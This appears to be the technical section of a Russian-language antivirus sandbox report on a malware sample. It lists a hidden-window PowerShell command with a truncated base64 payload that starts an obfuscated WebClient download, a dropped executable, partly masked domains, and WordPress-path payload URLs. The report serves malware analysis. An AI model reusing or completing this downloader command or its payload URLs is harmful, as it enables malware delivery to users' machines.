Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AEQAQQB4AEcAdwBBAD0AKAAnAFMAJwArACcAQQBvAEEARAAnACsAJwBRAEEAQQAnACkAOwAkAHQAQQBvAGMARABCAEQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1005769.cvr
- %HOMEPATH%\809.exe
- 'ma###naball.com':80
- 'dr#####witharrow.com':80
- 'ka###iad.com':80
- 'ka###iad.com':443
- 'mo###racker.com':80
- 'mo###racker.com':443
- http://www.ma###naball.com/wp-content/Xbc/
- http://www.dr#####witharrow.com/wp-content/plugins/w8KF86/
- http://ka###iad.com/wp-admin/8Y98/
- http://mo###racker.com/wp-content/MYsw/
- 'ka###iad.com':443
- 'mo###racker.com':443
- DNS ASK ma###naball.com
- DNS ASK dr#####witharrow.com
- DNS ASK to###russia.com
- DNS ASK ka###iad.com
- DNS ASK mo###racker.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AEQAQQB4AEcAdwBBAD0AKAAnAFMAJwArACcAQQBvAEEARAAnACsAJwBRAEEAQQAnACkAOwAkAHQAQQBvAGMARABCAEQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...' (со скрытым окном)